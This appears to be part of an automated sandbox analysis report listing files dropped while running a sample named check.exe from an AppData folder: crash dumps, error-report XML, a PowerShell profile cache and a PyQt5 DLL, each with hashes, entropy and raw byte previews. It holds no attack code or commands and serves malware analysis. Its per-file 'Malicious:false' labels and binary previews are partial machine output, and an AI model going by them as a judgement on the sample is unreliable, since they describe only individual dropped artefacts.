                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.0.2.3.9.3.4.5.3.3.3.8.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.0.2.3.9.3.5.8.6.1.5.1.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.9.9.3.9.e.4.-.e.a.3.a.-.4.1.5.f.-.b.7.e.5.-.6.c.6.2.0.2.d.a.0.b.a.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.7.5.f.c.2.7.-.3.1.9.f.-.4.d.d.0.-.b.a.3.3.-.1.4.6.8.1.6.2.4.e.0.b.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.f.0.-.0.0.0.1.-.0.0.1.4.-.e.e.6.f.-.7.2.3.4.6.b.4.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.f.2.5.9.9.8.8.8.5.a.e.0.c.f.7.b.d.e.0.3.3.2.8.a.5.2.9.7.a.d.8.8.f.c.c.4.2.8.0.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.5.:.0.6.:.2.4.:.3.2.!.2.4.f.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_f58d6737a278c17bbf3304669ee8828e0d15e7d_9c0b4d08_f04ff051-a8aa-48f4-9ce9-315f881750a0\Report.wer

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.3589472856966842
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:gZ9TubS0PRjyjoRX3oYN7PZxGL9CNd8WUFxunbwkZyuwnGVYyBKXVIXv1SnYzuii:sSbZPRjyjM/wn0zRzuiFIY4lO8F
                                                                                                                                                                                                                                      MD5:5CF76CED084713EEB609FD47E9001D3F
                                                                                                                                                                                                                                      SHA1:B8F6E7D3ED1ED44DB743DD72AC3657A7B1519FA1
                                                                                                                                                                                                                                      SHA-256:4F91AFC81ED5C6A1BFAA089B3776368B1FF7C2DD7D261B86D7324DAFAD2943B5
                                                                                                                                                                                                                                      SHA-512:AC3AC03ACD5F2C10628F025F0B6C0A09E70F2ED4A4EFB178B1C1DD515B3651EFE5584976B7D90E7CC789BFB87245F1F7E61A61D0DA46AECB70D954B2BC1995C6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.0.2.3.9.4.5.2.1.3.6.6.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.0.2.3.9.4.5.9.1.6.7.8.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.0.4.f.f.0.5.1.-.a.8.a.a.-.4.8.f.4.-.9.c.e.9.-.3.1.5.f.8.8.1.7.5.0.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.b.b.9.c.3.7.-.f.6.d.7.-.4.3.d.5.-.9.0.b.d.-.d.b.f.8.6.4.2.4.5.3.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.1.8.-.0.0.0.1.-.0.0.1.4.-.8.0.8.a.-.7.c.3.c.6.b.4.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.f.2.5.9.9.8.8.8.5.a.e.0.c.f.7.b.d.e.0.3.3.2.8.a.5.2.9.7.a.d.8.8.f.c.c.4.2.8.0.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.5.:.0.6.:.2.4.:.3.2.!.2.4.f.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER43C9.tmp.dmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sat Dec 7 05:45:34 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):133986
                                                                                                                                                                                                                                      Entropy (8bit):2.0284071324005004
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:opYZurEZXUWfGPGASGqPC6SXtEuJ81jc6bgFL:JZLGPf4o6jc6bKL
                                                                                                                                                                                                                                      MD5:77086A928E3751F3D79BAD8804280745
                                                                                                                                                                                                                                      SHA1:6A68775C029D727CCBB3AFEC8E36680DDEAD6344
                                                                                                                                                                                                                                      SHA-256:DBD1A3450BE7506C87518CFB24E3B8E04A42C3C7BEC02365CAB0B0037838C8A6
                                                                                                                                                                                                                                      SHA-512:093F7D318A09F577E20688769503C26113A80481A8C165739EDAFA792ADFE4A834F2532E90B011D44318517EED42F30892D5A2F55997709774792C988F284FCC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MDMP..a..... .........Sg............$............%..8.......$....-...........\..........`.......8...........T............%...............-.........../..............................................................................eJ......p0......Lw......................T.............Sg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4560.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9602
                                                                                                                                                                                                                                      Entropy (8bit):3.7053667833245085
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJJFxl6Yx/+jYgmfSZpDM89b5/FVfxTm:R6lXJ7T6YJ+jYgmfSF5NVfI
                                                                                                                                                                                                                                      MD5:EC63073453E1F8B4A5AE1EE33DB8B36D
                                                                                                                                                                                                                                      SHA1:425FE3E498C26FE5D839CF1036B91B62471BFCDE
                                                                                                                                                                                                                                      SHA-256:E09BCD7FFECA06E1B87677208A84DF4308EFA2AA7AF73D664E275E8154A1F648
                                                                                                                                                                                                                                      SHA-512:9CE0FBC1CB1365B9BDC77EF1183358E4DCF5B4E24BE729D2496B0C991E947BC21F279F8A52E22C871203B8AFE3F288A65BACE665133AB3EA4ED9445538E21EBC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.2.0.<./.P.i.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER45BF.tmp.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4735
                                                                                                                                                                                                                                      Entropy (8bit):4.434087248556981
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zs6Jg771I9JGWpW8VYcYm8M4JvWDF0yq8vuWvtMZ9T1Sod:uIjfII76H7V4JOeW3vtMDT1Sod
                                                                                                                                                                                                                                      MD5:5B71814302FA6F90E096844E7AE05295
                                                                                                                                                                                                                                      SHA1:0CE0BA1913DAB480DE1DA1B16687B76443097FB6
                                                                                                                                                                                                                                      SHA-256:CDB3BDC1F818CE5AB12B909E3920E9DCF77B0D0E950EA5E975261E94F976E204
                                                                                                                                                                                                                                      SHA-512:C505AA9F555B0B4C258E0246F830A606A68D810EE7E1224F02EE86F51010D7C71B5A1224D9462FD6C5C3458A8A9789D63E8277ED97A453AD36AC4685BBDB97F3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="620448" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D98.tmp.dmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sat Dec 7 05:45:45 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):133520
                                                                                                                                                                                                                                      Entropy (8bit):2.043807567082314
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:I7yYcL8ur0icbSGdMbAh2nME+ZR/hlfrE/:I7PisSGdRWME+ZR/hlD
                                                                                                                                                                                                                                      MD5:867EA2CD430300CA72431218D23AB481
                                                                                                                                                                                                                                      SHA1:54BC311775A15A4719C123AA5D2C81CE5CE85D1F
                                                                                                                                                                                                                                      SHA-256:0F5B7EE5F4AF5BABB15A6A1DE564CAA28893BB5BF96279687123538549B5189D
                                                                                                                                                                                                                                      SHA-512:2E19C77B678ED20B4A79036525468B4B3575F14A455C0B74270BC321E7D1AD194F639704D9A9C5F2AD0381EA2DAC57CCD29973990024B96FC53DA6F2BE5FF510
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MDMP..a..... .........Sg............$............%..8.......$....-...........\..........`.......8...........T............&...............-.........../..............................................................................eJ......p0......Lw......................T.............Sg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6EC2.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9596
                                                                                                                                                                                                                                      Entropy (8bit):3.7082685011468044
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJyjqU6YmWKDDD4gmfSZpDp89b3Dourf3dm:R6lXJEqU6YaPD4gmfSa30urfQ
                                                                                                                                                                                                                                      MD5:0F0D1ADBED81D024F48DE3BBD65454F3
                                                                                                                                                                                                                                      SHA1:0E8CC636F06B5301E8685ADABAA5A57A069DA1C8
                                                                                                                                                                                                                                      SHA-256:2F02F2828B85B3E54BA02BE9A623D684907F6CB7D208A68631B315534F891C19
                                                                                                                                                                                                                                      SHA-512:41F1AD4994A964E7984E018D34AB2A4796EB229DEAAD1F738EDD05C4EF4D5A42AC60D28C5B441377F5D3A4D266C7F906D3F1AB93A292F16375EC1683F28BF68E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.0.8.<./.P.i.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F7E.tmp.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4735
                                                                                                                                                                                                                                      Entropy (8bit):4.435611795160004
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zs6Jg771I9JGWpW8VY4vYm8M4JvWDFOyq8vuWbMZ9T1S2ed:uIjfII76H7V6JOsW3bMDT1S2ed
                                                                                                                                                                                                                                      MD5:8AF5BA1C63E1E9C22AD959B17ABD79B1
                                                                                                                                                                                                                                      SHA1:31CF7323BD912B44233E99B7A864536F7DCAC716
                                                                                                                                                                                                                                      SHA-256:F21B1BA1CE2D93C2105A8C0E129A6EAEF0090437B1054BA01E0F08EACBE17DF0
                                                                                                                                                                                                                                      SHA-512:D9F272E4D778BE9E4321568C6687CC926ED5701AC751D8436C085DF3F30348947274509D3EAAA8491A44491608003E1651A0EAD4DE827213D6D3353E418439CC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="620448" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER910E.tmp.dmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sat Dec 7 05:45:54 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):130856
                                                                                                                                                                                                                                      Entropy (8bit):2.083270167512342
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:LyYPurHcVC3sbRqBAcAcq7skUTHZ+qQBJcHl8KpQytSnb:LyYPursiEMBApcuvUTHZ+qqJu2kEn
                                                                                                                                                                                                                                      MD5:72E32473E24E4703AED8C37730B9D886
                                                                                                                                                                                                                                      SHA1:840DBB4EF61A5006D48B88A3CE7C3E0595EA372F
                                                                                                                                                                                                                                      SHA-256:FE363EAFE5C7E08660FF3DA1298D8A4235FFE6389F329D662952F5BABCEC1B69
                                                                                                                                                                                                                                      SHA-512:9ACAD1C2717F91BEDCD3AA670112475500BF4CB6A7A9405533AF2B85B1B4A9869D85C6E717B9ABE995B9E63933B1C531A8E2A0C8CAA17BD1DB7224597E3FDFF8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MDMP..a..... .........Sg............$............%..8.......$....-...........\..........`.......8...........T............&...............-.........../..............................................................................eJ......p0......Lw......................T.............Sg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9257.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9596
                                                                                                                                                                                                                                      Entropy (8bit):3.7097311883528126
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJZuz6YIkJb4gmfSZpDa89bfqqVfDVm:R6lXJwz6YbJb4gmfSPfRVf8
                                                                                                                                                                                                                                      MD5:E3F5328E567AF007CD843CFB0B2376C7
                                                                                                                                                                                                                                      SHA1:ACE39A10E3BFB75A27F50C735C352C04890AB463
                                                                                                                                                                                                                                      SHA-256:2B6749CFACC879E4FAB10F73C07262DCFCA9F25AD2AAA0F87D97346A859329BA
                                                                                                                                                                                                                                      SHA-512:340C9842E2A6EAC4EC3660935EB3D79450ACD93C5546CC0FABD57C443077357A408530FA5AA4499F9FF82D03377AB4D484873053C6B88E7605C386B368E1B36A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.0.0.<./.P.i.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER941D.tmp.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4735
                                                                                                                                                                                                                                      Entropy (8bit):4.433977197321253
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zs6Jg771I9JGWpW8VY7Ym8M4JvWDFtyq8vuWfMZ9T1SNd:uIjfII76H7VHJO3W3fMDT1SNd
                                                                                                                                                                                                                                      MD5:FC6238894838F914DDCBCA34FC04816A
                                                                                                                                                                                                                                      SHA1:A1462249ED45D04FA39D9029720640D3F72962A3
                                                                                                                                                                                                                                      SHA-256:765B297E990BB4343FAC0F1F1E17C5BD2B0B980B581D5DA92A1A6BBE1A5D600E
                                                                                                                                                                                                                                      SHA-512:454F1C4E7E054E42B4671C3477702C1C4822331A444D1E57C330DEA6EAF7875A140970A56B9DD6DC6EAFDFAC9D1D38ECAEFE6A4B614DD0BA8452EFBBA9577861
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="620448" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1464
                                                                                                                                                                                                                                      Entropy (8bit):5.325182232108426
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:3VOSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9txNBJt/NKwJ0hNuTx9r8Hv9ILAl/:YSU4y4RQmFoUeCamfm9qr9trBLNGhNuw
                                                                                                                                                                                                                                      MD5:FCACE08ED629CC3A882DE42D909B39CA
                                                                                                                                                                                                                                      SHA1:7BDB27DB0ECBED1D57951EFC2624ABF8EFF540A9
                                                                                                                                                                                                                                      SHA-256:73FDD8B7F605172EC3673B7980EC9AF7A29D6CE4036C7E1D344613CD4A6ADB10
                                                                                                                                                                                                                                      SHA-512:D3F074FE3837792ED7D13EADC5472CB458F143B071ECC3986B6CA9809F27E7B7441C6C37AD121FE20B874BDD7A04C6A26CFB83BEFEE7E00C80EB7ECEF3344D4B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:@...e...........)....................................@..........@...............|.jdY\.H.s9.!..|(.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Management

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):590112
                                                                                                                                                                                                                                      Entropy (8bit):6.461874649448891
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:xI88L4Wu4+oJ+xc39ax5Ms4ETs3rxSvYcRkdQEKZm+jWodEEVh51:xD89rxZfQEKZm+jWodEEP5
                                                                                                                                                                                                                                      MD5:01B946A2EDC5CC166DE018DBB754B69C
                                                                                                                                                                                                                                      SHA1:DBE09B7B9AB2D1A61EF63395111D2EB9B04F0A46
                                                                                                                                                                                                                                      SHA-256:88F55D86B50B0A7E55E71AD2D8F7552146BA26E927230DAF2E26AD3A971973C5
